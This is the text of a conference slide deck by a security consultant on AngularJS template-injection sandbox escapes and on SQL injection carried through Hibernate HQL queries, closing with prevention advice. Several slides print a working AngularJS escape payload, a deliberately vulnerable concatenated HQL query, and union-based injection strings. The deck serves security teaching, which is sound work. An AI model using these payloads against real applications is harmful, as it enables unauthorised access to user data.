Advanced XSS and Injection Attacks - Speaker Deck

Advanced XSS and Injection Attacks

by Casey Dunham

Speaker Deck

Tweet

Tweet

Slide 1

Slide 1 text

Advanced XSS and Injection Attacks

Slide 2

Slide 2 text

Agenda • Introduction • AngularJS Expressions • AngularJS XSS • HQL SQLi • Prevention • Q + A

Slide 3

Slide 3 text

Introduction • Casey Dunham • Security Consultant for GuidePoint Security • Application Security • Code Reviews • Assessments • OWASP Maine • DC207 • TOOOL @CaseyDunham @GuidePointSec

Slide 4

Slide 4 text

AngularJS Expressions

Slide 5

Slide 5 text

No content

Slide 6

Slide 6 text

{{ product.name }}

{{ product.price | currency }} Add to Cart

...

Slide 7

Slide 7 text

{{ product.name }}

{{ product.price | currency }} Add to Cart

...

Slide 8

Slide 8 text

{{ product.name }}

{{ product.price | currency }} Add to Cart

...

Slide 9

Slide 9 text

{{ product.name }}

{{ product.price | currency }} Add to Cart

...

Slide 10

Slide 10 text

{{ product.name }}

{{ product.price | currency }} Add to Cart

...

Slide 11

Slide 11 text

{{ product.name }}

{{ product.price | currency }} Add to Cart

...

Slide 12

Slide 12 text

•Evaluated against a scope object •Evaluation is forgiving to undeﬁned and null •Filters can be used to format data before displaying it •No Control Flow Statements •No Function Declarations •No RegExp Creation With Literal Notation •No Object Creation With New Operator •No Bitwise, Comma, And Void Operators Versus JavaScript Expressions

Slide 13

Slide 13 text

AngularJS XSS

Slide 14

Slide 14 text

• Gareth Heyes (PortSwigger) • XSS without HTML: Client-Side Template Injection with AngularJS • http://blog.portswigger.net/2016/01/xss-without- html-client-side-template.html Prior Research

Slide 15

Slide 15 text

{{ 'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//‘); }} Sandbox Escape

Slide 16

Slide 16 text

{{ 'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//‘); }}

Slide 17

Slide 17 text

{{ 'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//‘); }}

Slide 18

Slide 18 text

{{ 'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//‘); }}

Slide 19

Slide 19 text

{{ 'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//‘); }}

Slide 20

Slide 20 text

DEMO

Slide 21

Slide 21 text

Hibernate Overview

Slide 22

Slide 22 text

• Mikhail Egorov / Sergey Soldatov • ORM2Pwn: Exploiting Injections in hibernate ORM • Zeronights 0x05 • New Methods for Exploiting ORM Injections in Java Applications • HITB 2016 (Later this May) Prior Research

Slide 23

Slide 23 text

• Renaud Dubourguais • HQL : Hyperinsane Query Language • Safety Symposium on Information and Communication Technologies (SSTIC) 2015

Slide 24

Slide 24 text

“Hibernate ORM (Hibernate in short) is an object-relational mapping framework for the Java language. It provides a framework for mapping an object-oriented domain model to a relational database.” - Wikipedia

Slide 25

Slide 25 text

“Hibernate's primary feature is mapping from Java classes to database tables; and mapping from Java data types to SQL data types.” - Wikipedia

Slide 26

Slide 26 text

No content

Slide 27

Slide 27 text

public class Customer { private Long id; private String name; private String accountId; public Long getId() { return id; } public void setId(Long id) { this.id = id; } … } id name account_id 1 acme acme_123 2 abc abc_789 3 xyz xyz_3843

Slide 28

Slide 28 text

String sql = "SELECT id, name, account_id FROM Customers WHERE account_id = ?”; PreparedStatement stmt = conn.prepareStatement(sql); stmt.setString(1, “acme_123”); ResultSet rs = stmt.executeQuery(); Customer c = new Customer(); if (rs.next()) { long id = rs.getLong("id"); c.setId(id); String name = rs.getString("name"); c.setName(name); String accountId = rs.getString("account_id"); c.setAccountId(accountId); }

Slide 29

Slide 29 text

String sql = "SELECT id, name, account_id FROM Customers WHERE account_id = ?”; PreparedStatement stmt = conn.prepareStatement(sql); stmt.setString(1, “acme_123”); ResultSet rs = stmt.executeQuery(); Customer c = new Customer(); if (rs.next()) { long id = rs.getLong("id"); c.setId(id); String name = rs.getString("name"); c.setName(name); String accountId = rs.getString("account_id"); c.setAccountId(accountId); }

Slide 30

Slide 30 text

String sql = "SELECT id, name, account_id FROM Customers WHERE account_id = ?”; PreparedStatement stmt = conn.prepareStatement(sql); stmt.setString(1, “acme_123”); ResultSet rs = stmt.executeQuery(); Customer c = new Customer(); if (rs.next()) { long id = rs.getLong("id"); c.setId(id); String name = rs.getString("name"); c.setName(name); String accountId = rs.getString("account_id"); c.setAccountId(accountId); }

Slide 31

Slide 31 text

String sql = "SELECT id, name, account_id FROM Customers WHERE account_id = ?”; PreparedStatement stmt = conn.prepareStatement(sql); stmt.setString(1, “acme_123”); ResultSet rs = stmt.executeQuery(); Customer c = new Customer(); if (rs.next()) { long id = rs.getLong("id"); c.setId(id); String name = rs.getString("name"); c.setName(name); String accountId = rs.getString("account_id"); c.setAccountId(accountId); }

Slide 32

Slide 32 text

String sql = "SELECT id, name, account_id FROM Customers WHERE account_id = ?”; PreparedStatement stmt = conn.prepareStatement(sql); stmt.setString(1, “acme_123”); ResultSet rs = stmt.executeQuery(); Customer c = new Customer(); if (rs.next()) { long id = rs.getLong("id"); c.setId(id); String name = rs.getString("name"); c.setName(name); String accountId = rs.getString("account_id"); c.setAccountId(accountId); }

Slide 33

Slide 33 text

String accountId = request.getParameter(“accountId”); String hql = "from Customer c where c.accountId = :accountId”; Query query = session.createQuery(hql); query.setString("accountId", accountId); Customer c = (Customer) query.uniqueResult();

Slide 34

Slide 34 text

String accountId = request.getParameter(“accountId”); String hql = "from Customer c where c.accountId = :accountId”; Query query = session.createQuery(hql); query.setString("accountId", accountId); Customer c = (Customer) query.uniqueResult();

Slide 35

Slide 35 text

String accountId = request.getParameter(“accountId”); String hql = "from Customer c where c.accountId = :accountId”; Query query = session.createQuery(hql); query.setString("accountId", accountId); Customer c = (Customer) query.uniqueResult();

Slide 36

Slide 36 text

String accountId = request.getParameter(“accountId”); String hql = "from Customer c where c.accountId = :accountId”; Query query = session.createQuery(hql); query.setString("accountId", accountId); Customer c = (Customer) query.uniqueResult();

Slide 37

Slide 37 text

String accountId = request.getParameter(“accountId”); String hql = "from Customer c where c.accountId = :accountId”; Query query = session.createQuery(hql); query.setString("accountId", accountId); Customer c = (Customer) query.uniqueResult();

Slide 38

Slide 38 text

@Entity @Table(name=“customer”) public class Customer { @Id @GeneratedValue( strategy=GenerationType.IDENTITY ) private Long id; @Column( name=“name”, nullable=false ) private String name; @Column( name=“account_id”, nullable=false ) private String accountId; … } id name account_id 1 acme acme_123 2 abc abc_789 3 xyz xyz_3843

Slide 39

Slide 39 text

Exploiting HQL Queries

Slide 40

Slide 40 text

• Similar to SQL • Fully Object Oriented • Uses mapped objects and their properties • More limited than SQL Hibernate Query Language

Slide 41

Slide 41 text

from Customer c where c.accountId = ‘acme_123’ Mapped Object Object Property Object Alias

Slide 42

Slide 42 text

Can Still Be Vulnerable To Injection public List findAllCustomersLike(String query) { Session session = getSession(); String hql = "from Customer c where c.name like '%" + query + “%'"; Query q = session.createQuery(hql); return (List) q.list(); }

Slide 43

Slide 43 text

Can Still Be Vulnerable To Injection public List findAllCustomersLike(String query) { Session session = getSession(); String hql = "from Customer c where c.name like '%" + query + “%'"; Query q = session.createQuery(hql); return (List) q.list(); }

Slide 44

Slide 44 text

No content

Slide 45

Slide 45 text

No content

Slide 46

Slide 46 text

Let’s Fix Our Injection String hql = "from Customer c where c.name like '%" + query + “%'";

Slide 47

Slide 47 text

Let’s Fix Our Injection String query = "' or 1=1 or ''='"; String hql = "from Customer c where c.name like '%" + query + “%'";

Slide 48

Slide 48 text

Let’s Fix Our Injection String hql = "from Customer c where c.name like '%" + "' or 1=1 or ''='" + "%'";

Slide 49

Slide 49 text

Success!

Slide 50

Slide 50 text

• Enumerate other columns (properties)? • Access other mapped objects? So Now What?

Slide 51

Slide 51 text

Screw that and let’s just get to the fun stuff.

Slide 52

Slide 52 text

Blind SQLi

Slide 53

Slide 53 text

HQL Injection SQL Injection

Slide 54

Slide 54 text

Escaping HQL • In HQL the \ is a valid character • In HQL to escape a ' we use ‘' • Can combine these to pass along our SQL Injection through HQL

Slide 55

Slide 55 text

No content

Slide 56

Slide 56 text

Success! • We can now continue along with a normal SQL Injection • But… • SQL needs to be Valid • HQL needs to be Valid as well

Slide 57

Slide 57 text

Here’s where it gets tricky

Slide 58

Slide 58 text

String hql = "from Customer c where c.name like '%" + query + "%'"; Injection Here

Slide 59

Slide 59 text

http://localhost/search?q=test

Slide 60

Slide 60 text

q=test' and 1='1

Slide 61

Slide 61 text

No content

Slide 62

Slide 62 text

q=test' and '1\''=1 -- '='1

Slide 63

Slide 63 text

q=test' and '1\''=1 union select 1,database(),3-- '='1

Slide 64

Slide 64 text

No content

Slide 65

Slide 65 text

q=test' and '1\''=1 union select 1,database(),version()— '='1

Slide 66

Slide 66 text

w00t!

Slide 67

Slide 67 text

select customer0_.id as id1_0_, customer0_.account_id as account_2_0_, customer0_.name as name3_0_ from customers customer0_ where ( customer0_.name like '%test' ) and '1\''=1 union select 1,database(),version()— '='1%'

Slide 68

Slide 68 text

Prevention

Slide 69

Slide 69 text

Prevention is the same as all SQL Injection

Slide 70

Slide 70 text

Don’t use String Concatenation To Build Queries!!

Slide 71

Slide 71 text

String accountId = request.getParameter(“accountId”); String hql = "from Customer c where c.accountId = :accountId”; Query query = session.createQuery(hql); query.setString("accountId", accountId); Customer c = (Customer) query.uniqueResult();

Slide 72

Slide 72 text

• Look for calls to • createQuery • createSQLQuery • All take HQL strings that could have potential for Injection.

Slide 73

Slide 73 text

Q + A

Slide 74

Slide 74 text

Thank You!

Slide 75

Slide 75 text

@CaseyDunham